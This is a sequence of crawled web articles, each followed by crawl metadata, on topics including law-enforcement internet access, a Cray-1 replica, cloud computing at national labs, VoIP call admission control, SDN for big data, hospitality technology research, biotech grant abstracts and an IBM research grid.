Although a higher degree of security is provided with an online service, protection remains a concern. Any e-mail messages routed over the Internet from an online service are insecure, and file attachments can be a problem with this type of e-mail. As a result, file encryption may not be a viable safeguard unless the e-mail is routed to another user who happens to use the same online service. Also, online services do not normally provide law enforcement agencies with the ability to have their own Web sites.
Law enforcement agencies have to keep their unique needs in mind when choosing an Internet option. There are many good ISPs to choose from and there are some excellent online service providers. They all provide worldwide e-mail capabilities with varying degrees of computer security and user features. Defining the technology needs of the law enforcement agency is a good first step in the decision-making process. Also, use the expertise of the agency's computer crime unit. Usually, such computer crime specialists are experienced and well-trained on these issues. If they don't have the answers, they will have access to other computer specialists who do.
Michael R. Anderson, who retired from the IRS's Criminal Investigation Division in 1996, is internationally recognized in the fields of forensic computer science and artificial intelligence. Anderson pioneered the development of federal and international training courses that have evolved into the standards used by law enforcement agencies worldwide in the processing of computer evidence.
He also authored software applications used by law enforcement agencies in 16 countries to process evidence and to aid in the prevention of computer theft. He continues to provide software free of charge to law enforcement and the military. He is currently a consultant. Contact him at P.O. Box 929 Gresham, OR 97030. | <urn:uuid:179dab0d-1af4-4ad7-b61e-c2bde4785266> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Internet-101-For-Cops.html?page=3 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00215-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952384 | 1,737 | 2.703125 | 3 |
Nearly four decades ago, the pioneering computer architect Seymour Cray created one of the most successful and iconic supercomputers ever made, the Cray-1. This 5.5-ton C-shaped tower was a popular sight in laboratories from its release in 1976 through the 1980s, but it eventually gave way to more powerful number crunchers as supercomputing advanced.
While all of these historic Crays have long since been retired, hobbyists Chris Fenton and Andras Tantos are determined to preserve this slice of computing history. The duo are endeavoring to reconstruct a working model of the renowned Cray-1 supercomputer at desktop scale, as Gigaom’s Signe Brewster reports.
In 2010, Chris Fenton, a New York City-based electrical engineer who works with modern-day supercomputers, decided to replicate the physical form of the Cray-1 at one-tenth its original size. Because the system’s hardware was well-documented online, the project proceeded smoothly. Fenton constructed the tower using a CNC machine and Gorilla Glue and built the bench out of wood. To perfect the look, he painted the tower and upholstered the bench in pleather. The final model is a one-tenth replica of the original Cray-1 supercomputer.
Next came the interesting part: making the model operational. It was easy enough to find a board capable of emulating the original Cray computational architecture. A $225 Spartan 3E-1600 board was small enough to fit inside the drawer that pulls out of the bench. Compared to the original Cray-1 price tag of between $5 million and $8 million, $225 was a steal.
To finish the project, Fenton needed software. This was the first real stumbling block. The code for the original operating system was not to be found online. Seeking analog copies, Fenton tried the Computer History Museum and even filed FOIA requests with “scary government agencies,” all to no avail.
A lead eventually surfaced from a former Cray employee, who contributed a disk pack containing the last ever version of the Cray OS, written for the successor to the Cray-1: the Cray X-MP. At this point, Tantos, a Microsoft electrical engineer, who had been conducting his own hunt for the Cray OS, took over the recovery project. It was an arduous year-long endeavor that included reverse engineering the OS from the image, but the Cray OS now works, save for a few remaining bugs.
Fenton is now working to upgrade his desktop system to be compatible with the Cray X-MP OS. The team is also looking for a compiler, so they can write their own applications and run them on the Cray.
“In some ways it’s sad, but in other ways it’s fascinating,” Tantos told Gigaom. “Seeing how extremely hard it is to come by software for these early computers, it’s even more important that we preserve what is available.”
“The Cray-1 is one of those iconic machines that just makes you say ‘Now that’s a supercomputer!’” Fenton wrote on his blog in 2010. “Sure, your iPhone is 10X faster, and it’s completely useless to own one, but admit it … you really want one, don’t you?”
If you have information that could benefit the project, you can contact the duo here. | <urn:uuid:c85f378f-dbf8-4180-b869-c67ebd60d5ba> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/01/17/hobbyists-seek-recreate-lost-cray-supercomputer/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00123-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.958873 | 738 | 3.09375 | 3 |
Two years ago, the Department of Energy's Office of Advanced Scientific Computing Research launched the Magellan project, a research and development effort aimed at harnessing cloud computing for the most demanding information processing of the national labs. A distributed testbed infrastructure was deployed at the Argonne Leadership Computing Facility and the National Energy Research Scientific Computing Center, then benchmarked against some of the most challenging applications, such as a particle physics experiment at the Large Hadron Collider or measuring the expansion of the universe. The team also tested Hadoop, MapReduce, and the Hadoop ecosystem on massive scientific problems in the cloud. Their final results, published in December, show both the potential and the current limitations of cloud computing for cutting-edge science.

The primary appeal of cloud computing for the national labs was flexibility and agility. Through virtualization, researchers could create whatever custom computing environment they needed, bring their own software stack, and try out new environments. Resources are also more flexible in the cloud: researchers enjoyed being able to rapidly scale to a problem and tap into economies of scale for massive data sets and workflows. Another benefit of the cloud for science was that it simplified collaboration, allowing researchers to share software and experiments with their peers. Hadoop and MapReduce showed promise for high-throughput data and very large workloads; often, the high-performance computing (HPC) systems in place at the national labs have scheduling policies that aren't compatible with this type of analysis.

Problems with applying deep science to the cloud, however, currently outweigh the benefits for most applications, so the national labs will not be switching over from HPC just yet. Adapting to the cloud, porting applications, and building up infrastructure took considerable time and skill, raising costs.

For most applications, which deal with truly massive workloads, have idiosyncratic needs, and are input/output intensive, traditional HPC currently performs better. Cloud worked best for applications that required minimal communication. The research team also had concerns about meeting the specific security and monitoring requirements of the national labs. Price was perhaps the biggest obstacle to implementing a cloud model: using a commercial cloud would cost between 3 and 7 times as much as the current computing centers, which already pool resources to cut costs. Even switching over to private clouds would exceed a lab's budget.

Cloud computing for deep research isn't doomed, however, as almost 40% of scientists would still want a cloud model even if performance suffered. There is also a lot of room for growth in this area; even during the two years of the study, researchers marked dramatic improvements to the open source software powering the cloud, such as Hadoop. To move forward, researchers sought improvements to MapReduce to better fit scientific data and workflows, as well as ways to bring some of the benefits of the cloud to the traditional HPC platforms the national labs have spent decades perfecting.
Call Admission Control (CAC) is often included as part of the same topic as Quality of Service (QoS), when in actuality CAC is a complete topic in its own right.

QoS is defined as traffic engineering on a packet-switched network: moving IP packets onto the wire and across the network in the fastest time possible, with the least amount of dropped packets. QoS manages this process by prioritizing different data flows. Packets with high sensitivity to the amount of time it takes to traverse the network, such as voice and video packets, receive a higher priority.

CAC prevents over-subscription of VoIP networks. It is used in the call set-up phase and applies to Real-Time Transport Protocol (RTP) traffic, also known as the media portion of a call. CAC complements QoS; however, its mechanisms of operation are very different. CAC protects voice traffic from the negative effects of excess voice traffic on the VoIP network by ensuring there is enough bandwidth for all authorized flows.
In most cases CAC is applied on Wide Area Network (WAN) links, where there is typically only enough bandwidth to support a small volume of calls. For example, if a WAN can only support five G.729 calls and six or more calls come in on that WAN, there would be degraded call quality for all calls on the WAN, not just for calls six and above. The reason call quality suffers for all calls is shared bandwidth. Generally, without any device to provide CAC, the system would continue to allow calls on the WAN circuit and exceed the bandwidth specifications of the WAN. With the insertion of a CAC device, the number of calls on the VoIP network is counted, with a limit set on how many calls can be placed on each WAN link. The CAC device starts rejecting call set-up messages when the limit is reached. It is then up to the initiating system to reroute the call onto another network, such as the Public Switched Telephone Network (PSTN).
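The five-call figure above can be reproduced with a back-of-the-envelope calculation. The sketch below assumes standard G.729 defaults (an 8 kbps codec, 20 ms packets, 40 bytes of IP/UDP/RTP headers, and 18 bytes of Ethernet framing) and a hypothetical 160 kbps voice budget on the WAN; real deployments vary, so treat the numbers as illustrative.

```python
def voip_call_bandwidth_bps(codec_bps=8000, packet_ms=20,
                            ip_udp_rtp_bytes=40, l2_bytes=18):
    """Per-call bandwidth on the wire, including header overhead."""
    payload_bytes = codec_bps / 8 * (packet_ms / 1000)   # 20 bytes for G.729
    packets_per_sec = 1000 / packet_ms                   # 50 pps
    frame_bytes = payload_bytes + ip_udp_rtp_bytes + l2_bytes
    return frame_bytes * 8 * packets_per_sec

def max_calls(wan_bps, call_bps):
    """How many calls a CAC device should admit before rejecting set-up."""
    return int(wan_bps // call_bps)

per_call = voip_call_bandwidth_bps()   # 31,200 bps per G.729 call on Ethernet
print(max_calls(160_000, per_call))    # a 160 kbps voice budget fits 5 calls
```

Note that the headers cost almost four times the voice payload itself, which is why CAC limits are far lower than the raw codec rate suggests.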
Within Cisco’s IP Telephony systems there are two main types of topology unaware CAC. Topology unaware CAC is defined as any mechanism that is based on a static configuration within a call processing agent or IP-Based PBX, aimed at limiting the number of simultaneous calls to or from a remote site connected via the IP WAN. Due to the reliance on static configurations, topology unaware CAC mechanisms must be designed in a simple hub-and-spoke topology.
Location Based Call Admission Control
Cisco Unified Communications Manager (CUCM) provides a simple mechanism known as static locations for implementing CAC in the centralized call processing deployment. When you configure a device in CUCM, the device can be assigned to a location. A certain amount of bandwidth will be allocated for calls to or from each location. CUCM can define a voice and video bandwidth pool for each location. If the location’s audio and video bandwidths are configured as “Unlimited”, there will be unlimited bandwidth available for that location and every audio or video call to or from that location will be permitted by CUCM. On the other hand, if the bandwidth values are set to a finite number of kilobits per second (kbps), CUCM will allow calls in and out of that location as long as the aggregate bandwidth used by all active calls is less than or equal to the configured values.
When an inter-site call is denied by CAC, CUCM can automatically reroute the call to the destination via the PSTN connection by means of the Automated Alternate Routing (AAR) feature. AAR is invoked only when the locations-based CAC denies the call due to a lack of network bandwidth. AAR is not invoked when the IP WAN is unavailable or other connectivity issues cause the called device to become unregistered with CUCM. In such cases, the calls are redirected to the target specified in the Call Forward No Answer field of the called device.
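The locations-based admission decision described above reduces to simple pool accounting. The sketch below is a minimal model, not CUCM's actual implementation: the 24 kbps per-call figure and the pool sizes are assumptions for illustration, and `None` stands in for the "Unlimited" setting.

```python
def admit_call(location_used_bps, location_limit_bps, call_bps):
    """Locations-based CAC: admit the call if the location's pool has room.

    A limit of None models the 'Unlimited' configuration, where every
    call to or from the location is permitted.
    """
    if location_limit_bps is None:
        return True
    return location_used_bps + call_bps <= location_limit_bps

# Branch office with a 96 kbps audio pool and two 24 kbps calls active:
print(admit_call(48_000, 96_000, 24_000))   # True: a third call fits
print(admit_call(96_000, 96_000, 24_000))   # False: reroute via AAR/PSTN
```

When the second check fails, this is exactly the point where AAR would redirect the call out the PSTN gateway rather than simply dropping it.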
Gatekeeper Based Call Admission Control
A Cisco IOS gatekeeper can provide call routing and CAC between devices such as CUCM, Cisco Unified Communications Manager Express (CME), or H.323 gateways connected to a legacy PBX. The gatekeeper uses the H.323 Registration Admission Status (RAS) protocol to communicate with these devices and route calls across the network.
Gatekeeper CAC is a policy-based scheme requiring static configuration of available resources. The gatekeeper is not aware of the network topology, so it is limited to simple hub-and-spoke topologies.
The CAC capabilities of a Cisco IOS gatekeeper are based on the concept of gatekeeper zones. A zone is a collection of H.323 devices, such as endpoints, gateways, or Multipoint Control Units (MCUs) that register with a gatekeeper.
The bandwidth command is used to manage the number of calls that the gatekeeper will allow, thus providing call admission control functionality. This command has several options, but the most relevant are the following:
- The interzone option controls the amount of bandwidth for all calls into or out of a given local zone.
- The total option controls the amount of bandwidth for all calls into, out of, or within a given local zone.
- The session option controls the amount of bandwidth per call for a given local zone.
- The remote option controls the total amount of bandwidth to or from all remote zones.
The bandwidth value deducted by the gatekeeper for every active call is double the bit-rate of the call, excluding Layer 2, IP, and RTP overhead.
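Putting the zone options and the doubling rule together, the gatekeeper's bookkeeping can be sketched as below. This is a toy model, not IOS behavior: the class and limit names merely mirror the `total` and `session` options, and the kbps figures are made up for illustration.

```python
class ZoneCAC:
    """Toy model of gatekeeper zone bandwidth accounting."""

    def __init__(self, total_bps, session_bps):
        self.total_bps = total_bps      # like 'bandwidth total' for the zone
        self.session_bps = session_bps  # like 'bandwidth session' per call
        self.used_bps = 0

    def admit(self, call_bitrate_bps):
        # The gatekeeper deducts double the call bit-rate, excluding
        # Layer 2, IP, and RTP overhead.
        cost = 2 * call_bitrate_bps
        if cost > self.session_bps or self.used_bps + cost > self.total_bps:
            return False                # caller must reroute (e.g., PSTN)
        self.used_bps += cost
        return True

zone = ZoneCAC(total_bps=256_000, session_bps=128_000)
print(zone.admit(64_000))   # True: 128 kbps deducted for a 64 kbps call
print(zone.admit(64_000))   # True: pool now full at 256 kbps
print(zone.admit(64_000))   # False: zone 'total' limit reached
```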
Resource Reservation Protocol – Topology Aware CAC
CUCM Release 5.0 introduces a topology aware CAC mechanism based on the Resource Reservation Protocol (RSVP). Topology aware CAC is applicable to any network topology and eases the restriction of a traditional hub-and-spoke topology. The Cisco RSVP Agent is a Cisco IOS feature that enables CUCM to perform the RSVP-based CAC. The Cisco RSVP Agent feature has been introduced into Cisco IOS Release 12.4(6)T and is available on the Cisco 2800 Series and 3800 Series Integrated Services Routers platforms.
The Cisco RSVP Agent registers with Unified CM as either a media termination point (MTP) or a transcoder device with RSVP support. When an endpoint device makes a call in need of a bandwidth reservation, CUCM invokes a Cisco RSVP Agent to act as a proxy for the endpoint to make the bandwidth reservation.
Calculating Bandwidth for CAC
In both cases of topology unaware CAC you will have to inform the CAC mechanism how much bandwidth is available on each WAN link. You can do this by reading two of my previous posts:
Fudge Math of CAC
Calculating VoIP Bandwidth
SRND for CUCM 7.x
Author: Paul Stryer | <urn:uuid:e031e866-b1a6-410b-80d0-913a70044156> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2009/08/20/call-admission-control/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00179-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.914529 | 1,470 | 2.78125 | 3 |
- A11yComponentActivationEvent - Represents an activation event from an assistive technology.
- A11yComponentActivationType - Provides an enumeration describing the different types of activations that can be performed through accessibility.
- A11yMode - A set of modes used to specify how a control and its subtree are exposed to assistive technologies.
- A11yRole - A set of roles that can be used on accessibility objects for use with assistive technologies.
- A11yState - Represents the different accessible states that specify the state of an accessible control through its accessibility object.
- A11yStateHolder - Holds the state of an accessibility object.
- A11yValueAdjustmentType - Represents different ways a value can be adjusted.
- AbstractA11yObject - Defines a control's accessibility properties.
- AbstractA11ySpecialization - Class defining an abstract accessibility specialization.
- ComponentA11ySpecialization - Class defining a "component" accessibility specialization.
- CustomA11yObject - Accessibility object that can be used to implement custom accessibility behavior.
- ValueA11ySpecialization - Class defining a "Value" accessibility specialization.
This vendor-written tech primer has been edited by Network World to eliminate product promotion, but readers should note it will likely favor the submitter's approach.
Over the past few years organizations have awakened to the fact that there is knowledge hidden in Big Data, and vendors are feverishly working to develop technologies such as Hadoop MapReduce, Dryad, Spark and HBase to efficiently turn this data into information capital. That push will benefit from the emergence of another technology: Software-Defined Networking (SDN).
Much of what constitutes Big Data is actually unstructured data. While structured data fits neatly into traditional database schemas, unstructured data is much harder to wrangle. Take, for example, video storage. While the video file type, file size, and the source IP address are all structured data, the video content itself, which doesn't fit in fixed length fields, is all unstructured. Much of the value obtained from Big Data analytics now comes from the ability to search and query unstructured data -- for example, the ability to pick out an individual from a video clip with thousands of faces using facial recognition algorithms.
The technologies aimed at the problem achieve the speed and efficiency required by parallelizing the analytic computations on the Big Data across clusters of hundreds of thousands of servers connected via high-speed Ethernet networks. Hence, the process of mining intelligence from Big Data fundamentally involves three steps: 1) Split the data into multiple server nodes; 2) Analyze each data block in parallel; 3) Merge the results.
These operations are repeated through successive stages until the entire dataset has been analyzed.
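The three-step Split-Analyze-Merge cycle can be sketched in miniature. The example below is a single-process stand-in for what frameworks like Hadoop run across thousands of nodes, using word counting as the per-block analysis:

```python
from collections import Counter

def split(records, n_nodes):
    """Step 1: partition the data across server nodes."""
    return [records[i::n_nodes] for i in range(n_nodes)]

def analyze(block):
    """Step 2: each node processes its block in parallel (here, word counts)."""
    return Counter(word for line in block for word in line.split())

def merge(partials):
    """Step 3: combine per-node results; this transfer is where the
    network strains in a real cluster."""
    total = Counter()
    for partial in partials:
        total += partial
    return total

logs = ["error disk full", "ok", "error timeout", "ok ok"]
result = merge(analyze(block) for block in split(logs, n_nodes=2))
print(result["ok"], result["error"])   # 3 2
```

In a real deployment, steps 1 and 3 move data between machines, which is exactly the traffic the article's network bottleneck argument is about.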
Owing to the Split-Merge nature of these parallel computations, Big Data analytics can place a significant burden on the underlying network. Even with the fastest servers in the world, data processing speed, the biggest bottleneck for Big Data, can only be as fast as the network's capability to transfer data between servers in both the Split and Merge phases. For example, a study of Facebook traces showed that data transfer between successive stages accounted for 33% of the total running time, and for many jobs the communication phase took up over 50% of the running time.

By addressing this network bottleneck we can significantly speed up Big Data analytics, which has two-fold implications: 1) better cluster utilization reduces TCO for the cloud provider that manages the infrastructure; and 2) faster job completion times enable real-time analytics for the customer that rents the infrastructure.
What we need is an intelligent network that, through each stage of the computation, adaptively scales to suit the bandwidth requirements of the data transfer in the Split & Merge phases, thereby not only improving speed-up but also improving utilization.
The role of SDN
SDN has huge potential to build the intelligent adaptive network for Big Data analytics. Due to the separation of the control and data plane, SDN provides a well-defined programmatic interface for software intelligence to program networks that are highly customizable, scalable and agile, to meet the requirements of Big Data on-demand.
SDN can configure the network on-demand to the right size and shape for compute VMs to optimally talk to one another. This directly addresses the biggest challenge that Big Data, a massively parallel application, faces: slow processing. Processing is slow because most compute VMs in a Big Data application spend a significant amount of time waiting for massive amounts of data to arrive during scatter-gather operations before they can begin processing. With SDN, the network can create secure pathways on-demand and scale capacity up during the scatter-gather operations, thereby significantly reducing the waiting time and hence the overall processing time.
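As an illustrative sketch of that scale-up/scale-down idea, the code below models a controller reserving extra bandwidth on mapper-to-reducer paths for the duration of a shuffle and releasing it afterwards. The `Network` class and its methods are hypothetical stand-ins; a real SDN controller would expose this through OpenFlow rules or a REST API.

```python
class Network:
    """Stand-in for an SDN controller's global view of reserved capacity."""

    def __init__(self):
        self.paths = {}   # (src, dst) -> reserved bandwidth in Mbps

    def reserve(self, src, dst, mbps):
        self.paths[(src, dst)] = self.paths.get((src, dst), 0) + mbps

    def release(self, src, dst, mbps):
        self.paths[(src, dst)] -= mbps

def run_shuffle(net, mappers, reducers, mbps_per_flow):
    """Scale paths up for the Merge (shuffle) phase, then scale back down."""
    flows = [(m, r) for m in mappers for r in reducers]
    for m, r in flows:
        net.reserve(m, r, mbps_per_flow)
    # ... the scatter-gather transfer happens here at the provisioned rate ...
    for m, r in flows:
        net.release(m, r, mbps_per_flow)

net = Network()
run_shuffle(net, ["m1", "m2"], ["r1"], mbps_per_flow=100)
print(all(v == 0 for v in net.paths.values()))   # True: capacity returned
```

The point of the sketch is the lifecycle: capacity follows the application's communication phases rather than being statically provisioned for the worst case.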
This software intelligence, which is fundamentally an understanding of what the application needs from the network, can be derived with much precision and efficiency for Big Data applications. The reason is two-fold: 1) the existence of well-defined computation and communication patterns, such as Hadoop's Split-Merge or Map-Reduce paradigm; and 2) the existence of a centralized management structure that makes it possible to leverage application-level information, e.g. Hadoop Scheduler or HBase Master.
With the aid of the SDN controller, which has a global view of the underlying network (its state, its utilization, and so on), the software intelligence can accurately translate application needs by programming the network on-demand.
SDN also offers other features that assist with the management, integration and analysis of Big Data. New SDN-oriented technologies, including OpenFlow and OpenStack, promise to make network management easier, more intelligent and highly automated. OpenStack enables the set-up and configuration of network elements using far less manpower, and OpenFlow assists in network automation, providing greater flexibility to support new pressures such as data center automation, BYOD, security and application acceleration.
From a size standpoint, SDN also plays a critical role in developing network infrastructure for Big Data, facilitating streamlined management of thousands of switches, as well as the interoperability between vendors that lays the groundwork for accelerated network build out and application development. OpenFlow, a vendor-agnostic protocol that works with any vendor's OpenFlow-enabled devices, enables this interoperability, unshackling organizations from the proprietary solutions that could hinder them as they work to transform Big Data into information capital.
As the powerful implications and potential of Big Data become increasingly clear, ensuring that the network is prepared to scale to these emerging demands will be a critical step in guaranteeing long-term success. A successful solution will leverage two key elements: the existence of patterns in Big Data applications and the programmability of the network that SDN offers. From that vantage point, SDN is indeed poised to play an important role in enabling the network to adapt further and faster, driving the pace of knowledge and innovation.
About the Author: Bithika Khargharia is a senior engineer focusing on vertical solutions and architecture at Extreme Networks. With more than a decade in the field of technology research and development with companies including Cisco, Bithika's experience in Systems Engineering spans sectors including green technology, manageability and performance; server, network, and large-scale data center architectures; distributed (grid) computing; autonomic computing; and Software-Defined Networking.
This story, "SDN Networks Transform Big Data Into Information Capital" was originally published by Network World. | <urn:uuid:fbad9527-457b-411a-9cd5-b89d54f8e043> | CC-MAIN-2017-04 | http://www.cio.com/article/2381657/big-data/sdn-networks-transform-big-data-into-information-capital.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00023-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.916522 | 1,325 | 2.609375 | 3 |
We usually think of the digital divide as the line between the technology “haves” and the “have nots.” A set of studies from the Cornell Center for Hospitality Research has unearthed an additional set of dimensions involving people who have technology, but use it in different ways, starting with “users” versus “non-users.”
Let’s start with a look at fast-casual restaurant carryout orders. A study of 470 Internet users by Cornell professor Sheryl Kimes found that about half ordered food using a restaurant’s website, mobile app or text message. Those who placed an electronic order indicated that confidence in order accuracy, convenience, and ease of ordering and delivery are important factors.
Despite this, a substantial number of participants indicated that they won’t use technology to order food because they prefer a personal connection. Overall, the telephone remains the top channel for food ordering.
On the hotel side, a study of 2,800 travelers (“How Travelers Use Online and Social Media to Make Hotel-choice Decisions” by Laura McCarthy, Debra Stock, and Rohit Verma) found a digital divide between business and leisure travelers in terms of how they gather information about hotels. Business travelers tended to rely on recommendations from their company, but use search engines and online travel agents to work out travel details and bookings. In contrast, leisure travelers conduct a considerable search across social media sites, online travel agents and search engines. Yet the number-one source for travel information remains friends and family.
This presents another kind of digital divide: customers do use the Internet for information gathering, but they still rely heavily on old-fashioned word-of-mouth. With the basic information and recommendations in hand, leisure travelers are more likely to turn to electronic sources for prices and availabilities. Finally, late in the process, these travelers were likely to book their room through the brand website or an OTA.
What’s more, additional research points to a demographic digital divide. The Kimes report on electronic food ordering revealed that technology users tended to be younger than non-users, and also frequent restaurants more often. But there’s more. Speaking at the Cornell Hospitality Research Summit last fall, Chris Klauda, vice president of quality services for D.K. Shifflet & Associates, outlined the dimensions of the demographic digital divide. The challenge begins with the fact that online sampling covers “only” about 75 percent of U.S. households. That’s a lot of people, but it’s important to look at the 25 percent who are left out of Internet studies.
D.K. Shifflet studied two groups of consumers: one group of nearly 52,000 people received a monthly mail survey; the other group of just over 23,000 consumers filled out a monthly Internet questionnaire. Findings revealed that Internet-only market research studies under-represent two important groups: business travelers and households with incomes of more than $50,000 (since a heavier proportion of younger, tech-savvy travelers responding to the Internet survey haven’t yet hit their peak earning potential).
If your main market segment is leisure travelers with household incomes of under $50,000 (which is a valuable market) you may be able to rely on consumer data from Internet sources. But move carefully with regard to business and upscale travelers. A blend of electronic and traditional market research is probably the best approach. While these studies present a snapshot in time, we know that the general trend pushes toward the increasing use of the Internet and social media. However, we should not let our enthusiasm for electronic sources cause us to overlook the many dimensions of the digital divide, whether that’s for users versus non-users or business travelers versus leisure travelers. In short, don’t disconnect your landline, just yet.
Aislabie J.M. (Landcare Research); Lau A., Dsouza M., Shepherd C. (University of Auckland); and 2 more authors. Extremophiles | Year: 2013
The aim of this study was to examine the bacterial composition of high latitude soils from the Darwin-Hatherton glacier region of Antarctica. Four soil pits on each of four glacial drift sheets were sampled for chemical and microbial analyses. The four drifts-Hatherton, Britannia, Danum, and Isca-ranged, respectively, from early Holocene (10 ky) to mid-Quaternary (ca 900 ky). Numbers of culturable bacteria were low, with highest levels detected in soils from the younger Hatherton drift. DNA was extracted and 16S rRNA gene clone libraries prepared from samples below the desert pavement for each of the four drift sheets. Between 31 and 262 clones were analysed from each of the Hatherton, Britannia, and Danum drifts. Bacterial sequences were dominated by members of the phyla Deinococcus-Thermus, Actinobacteria, and Bacteroidetes. Culturable bacteria, including some that clustered with soil clones (e.g., members of the genera Arthrobacter, Adhaeribacter, and Pontibacter), belonged to Actinobacteria and Bacteroidetes. The isolated bacteria are ideal model organisms for genomic and phenotypic investigations of those attributes that allow bacteria to survive and/or grow in Antarctic soils because they have close relatives that are not tolerant of these conditions. © 2013 Springer Japan.
Agency: Department of Health and Human Services | Branch: | Program: SBIR | Phase: Phase I | Award Amount: 156.81K | Year: 2014
DESCRIPTION (provided by applicant): Cancers selected for the NIH's The Cancer Genome Atlas (TCGA) project have been chosen because of their poor prognosis and overall public health impact. Select tissue samples have been profiled for gene and miRNA expression, promoter methylation, DNA sequence and mutation analysis, as well as copy number variation (CNV), with total expenditures of $275 million. The copy number variation (CNV) information, derived from the raw array-based comparative genomic hybridization (aCGH) and SNP-array data, has been successfully utilized in specific application areas, such as identification of significant recurrent aberrations in each tumor type from population-wide, tumor-specific analysis. However, the full potential of this data has not yet been exploited. The two major obstacles have been the method used to perform the initial data processing, which has somewhat limited its utility, and the lack of a comprehensive integrated data access and analytical platform for copy n
Biodiscovery, Inc. | Date: 2014-11-03
Agency: Department of Health and Human Services | Branch: | Program: SBIR | Phase: Phase I | Award Amount: 214.71K | Year: 2010
DESCRIPTION (provided by applicant): There is a growing demand for custom synthesis of short gene libraries coding for active peptides or regulatory RNAs. DNA microarrays can be manufactured by synthesizing oligonucleotides on a solid substrate in a massively-parallel manner using a high-yield, low-cost chemistry. Oligonucleotides can be cleaved off the microarray surface and recovered as a pool. Our hypothesis is that we can use this technology to create custom libraries of long DNA oligonucleotides at a much reduced cost and increased complexity compared to current technologies. Our long-term objective is to implement a commercial service for affordable custom synthesis of long oligonucleotide libraries. These libraries are used as research tools in many applications such as studies on gene silencing, protein-DNA interaction, epitope mapping or even antimicrobial peptides. There are no limits to applications other than the imagination of scientists. The health relatedness of the project resides in the fact that these applications lead to the discovery of new cellular mechanisms, diagnostic tools, drugs or even vaccines. The scope of the proposed project is 1) to demonstrate the feasibility of using an emulsion-based PCR to amplify oligonucleotide libraries; 2) to investigate the possibility of synthesizing libraries of oligonucleotides up to 150-mer in length; and 3) to determine the synthesis error rate and type of sequence mutations present in these libraries. We will in particular test the effect of droplet size and number of templates per droplet on the PCR amplification of oligonucleotide templates in an emulsion. We will characterize the complexity of an amplified library by deep-sequencing a PCR product. The large amount of sequence information obtained will also permit an in-depth characterization of the types of errors occurring during massively-parallel long oligonucleotide synthesis.
PUBLIC HEALTH RELEVANCE: The unprecedented availability of affordable custom libraries of long oligonucleotides will enable new experimentations in fields such as gene silencing, protein-DNA interaction, epitope mapping or even antimicrobial peptides. This technology will undoubtedly bolster the discovery of new cellular mechanisms, diagnosis tools, drugs or even vaccines, ultimately benefiting the society.
Agency: Department of Health and Human Services | Branch: | Program: SBIR | Phase: Phase I | Award Amount: 219.26K | Year: 2010
DESCRIPTION (provided by applicant): Peptides play a significant role in the defense mechanisms of the body and the binding of cells, bacteria and viruses to surfaces. Combinatorial peptide chemistry has emerged as a powerful tool for mapping receptor-ligand interactions in drug discovery applications as well as epitope mapping. There is a huge, but largely unrealized, potential for peptide microarray applications in drug discovery, the study of cellular pathways and the treatment of tumors. There are two reasons why peptide microarrays have not yet reached their potential: i) the enormous diversity possible with peptide microarrays, and ii) the high cost of peptide microarrays in comparison to DNA microarrays. In this proposal our goals are to: 1) Develop a highly flexible and fast in situ custom peptide synthesis technology which can lower the cost of peptide microarrays by at least an order of magnitude and reduce the synthesis time to less than 24 hours for peptides containing up to 15 amino acids; 2) Increase the density of peptides on a microarray by an order of magnitude to more than 10,000 per array; 3) Use fluorescent probes as well as high-resolution mass spectroscopy to determine sequence purity and stepwise yields for the addition of each of the 20 naturally occurring amino acids. We have developed a revolutionary light-gated oligonucleotide microarray synthesis technology which uses off-the-shelf reagents and a modified projector to carry out custom microarray synthesis on open or curved surfaces with probe densities of up to 500K per glass slide for about one-tenth the cost of most commercial microarrays of similar density. In this project we will modify the chemistry and instrumentation used for oligonucleotide microarray synthesis to develop a system for combinatorial peptide synthesis on open/closed slide surfaces or membranes.
IBM and the Department of Energy are building a nationwide computer grid that ultimately will process more than 10 trillion calculations per second and store massive amounts of data.
IBM and the U.S. Department of Energy announced on Friday that they have begun building a nationwide computer grid that ultimately will be capable of processing more than 10 trillion calculations per second and storing information equivalent to 200 times the number of books in the Library of Congress.
The grid eventually will offer scientists and researchers across the country real-time access to trillions of bytes of data stored at labs nationwide, according to IBM.
Grids are designed to allow quick access to applications, data and computing resources housed at distant locations. While similar in some ways to the Internet, grids offer far greater advantages by enabling users to tap the computing power of potentially thousands of systems attached to the grid simultaneously, creating a virtual supercomputer.
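The fan-out/fan-in pattern a grid enables can be mimicked locally. In this stdlib-only sketch a thread pool stands in for grid nodes; it illustrates the partitioning pattern, not real cross-machine speed-up, which is what grid middleware provides:

```python
# Local stand-in for the grid pattern: split the work, send each chunk
# to a "node", and merge the partial results. A thread pool plays the
# role of remote machines here purely for illustration.
from concurrent.futures import ThreadPoolExecutor

def node_work(chunk):
    # The unit of work a single grid node would perform.
    return sum(x * x for x in chunk)

def grid_sum_of_squares(data, nodes=4):
    size = max(1, len(data) // nodes)
    chunks = [data[i:i + size] for i in range(0, len(data), size)]
    with ThreadPoolExecutor(max_workers=nodes) as pool:
        return sum(pool.map(node_work, chunks))

print(grid_sum_of_squares(list(range(1000))))
```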
Efforts to develop grids are underway in various countries throughout the world. Last summer, Britain announced plans to build a national grid linking nine research centers and the National Science Foundation announced it would link four of its U.S. supercomputing centers into a power grid network.
A major challenge to developing grids centers on creating common protocols to enable computers utilizing different proprietary hardware and software to not only communicate with each other, but interact almost as closely as if they were all using one operating system.
The IBM and DOE grid will be based on clusters of servers joined together over the Internet using protocols developed in conjunction with the Globus open source community, as well as other open source technologies, such as Linux.
While most current grid projects primarily focus on aiding government and scientific research, IBM representatives said the technology could eventually find its way into commercial use.
"The DOE Science Grid is a template for the kind of system that can enable partnerships between public institutions and private companies aimed at creating new products and technologies for business," said Val Rahmani, general manager of IBM eServer, pSeries.
